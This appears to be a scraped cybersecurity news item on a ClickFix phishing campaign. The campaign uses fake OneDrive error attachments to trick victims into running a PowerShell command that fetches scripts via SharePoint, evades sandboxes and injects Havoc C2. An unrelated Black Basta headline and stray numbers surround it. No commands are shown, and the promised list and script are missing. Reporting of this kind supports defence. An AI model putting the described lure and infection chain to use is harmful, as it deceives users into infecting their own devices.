Oleg Nefyodov, the leader of the cybercrime group Black Basta, detained in Armenia, took advantage of the court delay and fled, causing international outcry.
61 
New ClickFix Phishing Modality Uses Social Engineering to Trick Victims into Running Malicious Code Fortiguard researchers have discovered that the attack uses Microsoft SharePoint to distribute the malicious code. Below is a list of the most common methods used to distribute the malicious code.
ClickFix is a tactic where attackers create websites or attachments with fake errors, urging users to click a “Fix” button. In the new campaign, cybercriminals send phishing emails with a “limited notification” message that supposedly needs to be viewed via an attached HTML file. When opened, the document displays a fake error 0x8004de86, stating that OneDrive cannot be connected. The victim is prompted to manually refresh the DNS cache, which requires copying and running a PowerShell command.
This command downloads the following script from the attacker’s server to SharePoint. If the device is running in an analysis environment (such as a sandbox), the script stops working. Otherwise, it modifies the Windows registry, checks for Python and installs it if necessary. Next, a new script is downloaded that injects Havoc C2 as a DLL.
ʼClickFix is a growing threat that uses social engineering techniques to infect devices. Users are advised to be cautious, not to execute commands from suspicious sources and to verify the authenticity of error messages.
61 
62 
82